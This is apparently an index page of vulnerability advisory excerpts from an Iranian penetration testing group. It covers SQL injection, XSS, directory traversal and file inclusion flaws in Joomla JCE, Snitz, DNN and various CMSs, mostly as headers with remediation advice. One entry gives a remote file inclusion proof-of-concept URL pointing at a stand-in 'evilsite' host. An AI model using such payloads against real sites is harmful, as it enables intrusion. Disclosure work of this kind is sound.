New User, Welcome!     Login

Next Page >>

Penetration Testing Group

Related POC for JCE Joomla Extension <=2.0.10 Multiple Vulnerabilities

PHP Version:
<?php
######################################### www.bugreport.ir  
########################################
#
#                     AmnPardaz Security Research & Penetration Testing Group
#
#
# Title:                  Exploit for JCE Joomla Extension (Auto Shell  
Uploader) V0.1 - PHP Version
# Vendor:                 http://www.joomlacontenteditor.net

[CandyPress] eCommerce suite (SQL Injection + XSS + Path Disclosure)

########################## WwW.BugReport.ir ###########################################
#
#      AmnPardaz Security Research & Penetration Testing Group
#
# Title: [CandyPress] eCommerce suite
# Vendor: http://www.candypress.com/
# Bugs: SQL Injection + XSS + Path Disclosure in CandyPress
# Vulnerable Version: 4.1.1.26
# Exploit: Available
# Fix Available: Yes!, Update to 4.1.1.27 (http://www.candypress.com/CPforum/forum_posts.asp?TID=10630&PN=1) (There is a fast solution too)

Jupiter Cms Multiple Vulnerabilities

########################## WwW.BugReport.ir  
###########################################
#
#      AmnPardaz Security Research & Penetration Testing Group
#
# Title: Jupiter Cms Multiple Vulnerabilities
# Vendor: http://www.jupiterportal.com
# Bugs: Local File Inclusion, Privileges Escalation
# Vulnerable Version: 1.1.5ex (prior versions also may be affected)

SkyPortal vRC6 Multiple Remote Vulnerabilities

Opencosmo Security
www.opencosmo.com

########################## WwW.BugReport.ir ###########################################
#
#      BugReport Security Research & Penetration Testing Group
#
# Title: [Sky Portal] Multiple SQL Injection Vulnerabilities
# Vendor: http://skyportal.net
# Exploitation: Remote with browser
# Fix Available: Patched In Last Version In Vendor

CMME Multiple Information disclosure vulnerabilities

########################## WwW.BugReport.ir  
###########################################
#
#      AmnPardaz Security Research & Penetration Testing Group
#
# Title: CMME Multiple Information disclosure vulnerabilities
# Vendor: http://cmme.oesterholt.net
# Bug: Information Disclosure
# Vulnerable Version: 1.19 (prior versions also may be affected)
# Exploitation: Remote with browser

PHP <= 5.2.5 Safe Mode Bypass

########################## WwW.BugReport.ir  
#########################################
#
#      AmnPardaz Security Research & Penetration Testing Group
#
# Title: PHP <= 5.2.5 Safe Mode Bypass
# Vendor: http://www.php.net
# Vulnerable Function: tempnam()
# Vulnerable Version: tested on 5.2.5 , 5.2.4 (prior versions also may  
be affected)

AneCMS Multiple Vulnerabilities

http://www.bugreport.ir/index_71.htm

####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

Web Wiz NewsPad Directory traversal

####################
- Credit :
####################
Original Advisory: http://www.bugreport.ir/?/30
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com

Web Wiz Rich Text Editor Directory traversal + HTM/HTML file creation on the server

####################
- Credit :
####################
Original Advisory: http://www.bugreport.ir/?/31
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com

Web Wiz Forums Directory traversal

####################
- Credit :
####################
Original Advisory: http://www.bugreport.ir/?/29
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com

Acidcat CMS Multiple Vulnerabilities

####################
        Edit the source code to ensure that inputs are properly sanitized.
####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com

1024CMS Blind SQL Injection Vulnerability

http://www.bugreport.ir/index_69.htm

####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

Carbon Communities forum Multiple Vulnerabilities.

####################
        Edit the source code to ensure that inputs are properly sanitised.
####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com

Snitz2000 SQL Injection: A user can gain admin level

########################## WwW.BugReport.ir #########################
#
#      AmnPardaz Security Research & Penetration Testing Group
#
# Title: A user can gain admin level in snitz 2000 by SQL Injection
# vendor: http://forum.snitz.com/
# Googling: "Powered by Snitz" > 2,440,000 victims
# Last bug report in 2007-02-16 with 4692 visitors
# Exploit: Available
# Fix Available: Update to last version.

chillyCMS Multiple Vulnerabilities

or more simply restrict the parameters' length to a small length.

####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

Ferdows CMS Pro <=1.1.0 and Ferdows CMS <=9.0.5 Multiple Vulnerabilities

        Edit the source code to ensure that inputs are properly sanitized.

####################
5. Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

Dot Net Nuke (DNN) <= 4.8.3 XSS Vulnerability

        Check the vendor hotfix and use URLScan (http://www.microsoft.com/technet/security/tools/urlscan.mspx).
        
####################
5. Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com

eLineStudio Site Composer (ESC) <=2.6 Multiple Vulnerabilities

####################
        Edit the source code to ensure that inputs are properly sanitized (for 2.1, 2.2, 2.6). Rename the mentioned files in section 2.3, 2.4, 2.5, and wait for vendor patch.
####################
5. Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com

CFAGCMS Remote File Inclusion

POC: http://[URL]/cfagcms/themes/default/index.php?right=http://evilsite

####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

SphereCMS Blind SQL Injection Vulnerability

http://www.bugreport.ir/index_68.htm

####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

MyBlog <=0.9.8 Multiple Vulnerabilities

Rename the mentioned files in section 2.1, 2.4 and wait for vendor  
patch.
####################
5. Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com

Academic Web Tools CMS <= 1.4.2.8 Multiple Vulnerabilities

####################
        Source codes are encrypted. Wait for vendor patch.
####################
5. Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com

IGES CMS <=2.0 Multiple Vulnerabilities

####################
5. Credit:
####################

AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com

ParsaWeb CMS SQL Injection

        Edit the source code to ensure that inputs are properly sanitized.

####################
5. Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

Tinypug Multiple Vulnerabilities

####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload

Restrict and grant only trusted users access to the resources.

####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com

eLineStudio Site Composer (ESC) <=2.6 Multiple Vulnerabilities

####################
        Edit the source code to ensure that inputs are properly sanitized (for 2.1, 2.2, 2.6). Rename the mentioned files in section 2.3, 2.4, 2.5, and wait for vendor patch.
####################
5. Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com

chicomas <=2.0.4 Multiple Vulnerabilities

the source code to ensure that inputs are properly sanitized.

####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

Adobe LiveCycle ES DLL Hijacking Exploit (.dll)

http://www.bugreport.ir/index_74.htm

####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

Pooya Site Builder (PSB) SQL Injection Vulnerabilities

####################
        Rename or remove "/utils/getXsl.aspx", "/utils/getXml.aspx", and "/utils/getXls.aspx" files and wait for vendor patch.
####################
5. Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com
Next Page>>

Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!